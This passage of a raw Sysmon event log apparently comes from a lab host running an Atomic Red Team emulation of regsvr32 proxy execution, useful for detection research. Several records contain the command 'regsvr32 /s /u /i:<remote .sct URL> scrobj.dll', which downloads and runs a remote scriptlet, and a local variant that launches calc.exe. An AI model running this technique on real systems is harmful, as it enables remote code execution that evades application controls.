10341000x8000000000000000360094Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-36df-6013-9e03-000000001100}110569284C:\Windows\system32\cmd.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000360093Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.556{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\System32\regsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll"
13241300x8000000000000000360092Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.546{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data
10341000x8000000000000000360091Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1100-000000001100}111610484C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360090Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360089Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360088Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3)
10341000x8000000000000000360087Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360086Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360085Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360084Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360083Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360082Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27)
154100x8000000000000000360081Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.541{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
13241300x8000000000000000360080Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data
11241100x8000000000000000360079Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:12:47.186
11241100x8000000000000000360078Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:12:47.186
10341000x8000000000000000360077Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.499{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360076Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.499{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
13241300x8000000000000000360075Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.483{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data
13241300x8000000000000000360074Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.483{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data
10341000x8000000000000000360073Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360072Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360071Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360070Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360069Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360068Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-36df-6013-9c03-000000001100}100767164C:\Windows\system32\regsvr32.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\System32\windows.storage.dll+14c4a6|C:\Windows\System32\windows.storage.dll+14ccc3|C:\Windows\System32\windows.storage.dll+14c2e8|C:\Windows\System32\windows.storage.dll+14c113|C:\Windows\System32\windows.storage.dll+14be0d|C:\Windows\System32\windows.storage.dll+13d1d8|C:\Windows\System32\windows.storage.dll+14d6dd|C:\Windows\System32\windows.storage.dll+15bf79|C:\Windows\System32\SHELL32.dll+3ec1e|C:\Windows\System32\SHELL32.dll+41755|C:\Windows\System32\SHELL32.dll+c014e|C:\Windows\System32\shcore.dll+2dce5|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000360067Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.476{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=F88CC05134C555D4E1CD1DEF78162A9A,SHA256=A103A57D50B32469C5811E2808F021ADF9D9220093B540B8A9C83B5C821D370E,IMPHASH=8EEAA9499666119D13B3F44ECD77A729{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\System32\regsvr32.exeC:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll
10341000x8000000000000000360066Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.358{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360065Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.358{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4